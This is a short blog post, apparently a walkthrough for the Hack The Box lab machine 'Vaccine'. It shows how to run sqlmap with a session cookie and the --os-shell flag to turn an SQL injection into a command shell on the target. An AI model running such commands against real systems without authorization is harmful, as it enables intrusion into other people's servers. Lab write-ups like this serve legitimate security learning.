top of page

Basics - How to use sqlmap

sqlmap is used in the HTB machine Vaccine

First let's get the help using

sqlmap -h

This will help us structure our sqlmap query

1. We need to provide the target url


2. We need to provide the PHPSESSID


3. We need to add --os-shell to get a shell

--os-shell can be used to get a shell

With all that info we can now construct our query as follow:

sqlmap --url="" --cookie="PHPSESSID=530lii3ob5pbh3hii8rifld73o" --os-shell

Your IP and your PHPSESSID will be different than mine

You will now be prompted to enter Y or N a couple of times. Just press enter for all.

We got the shell!

341 views0 comments

Recent Posts

See All
bottom of page